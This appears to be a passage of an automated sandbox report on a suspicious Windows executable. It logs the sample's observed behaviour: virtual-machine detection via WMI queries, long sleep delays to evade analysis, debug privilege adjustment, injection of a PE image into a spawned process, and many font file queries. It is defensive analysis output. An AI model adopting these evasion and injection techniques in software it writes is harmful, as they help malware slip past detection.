            Source: C:\Users\user\Desktop\Smh3IA9098.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
            Source: C:\Users\user\Desktop\Smh3IA9098.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
            Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
            Source: C:\Users\user\Desktop\Smh3IA9098.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
            Source: C:\Users\user\Desktop\Smh3IA9098.exe TID: 4612Thread sleep time: -40023s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exe TID: 1432Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exe TID: 320Thread sleep count: 647 > 30Jump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeWindow / User API: threadDelayed 647Jump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Users\user\Desktop\Smh3IA9098.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Users\user\Desktop\Smh3IA9098.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Users\user\Desktop\Smh3IA9098.exeThread delayed: delay time: 40023Jump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeMemory allocated: page read and write | page guardJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Injects a PE file into a foreign processes
            Source: C:\Users\user\Desktop\Smh3IA9098.exeMemory written: C:\Users\user\Desktop\Smh3IA9098.exe base: 400000 value starts with: 4D5AJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeProcess created: C:\Users\user\Desktop\Smh3IA9098.exe C:\Users\user\Desktop\Smh3IA9098.exeJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Users\user\Desktop\Smh3IA9098.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
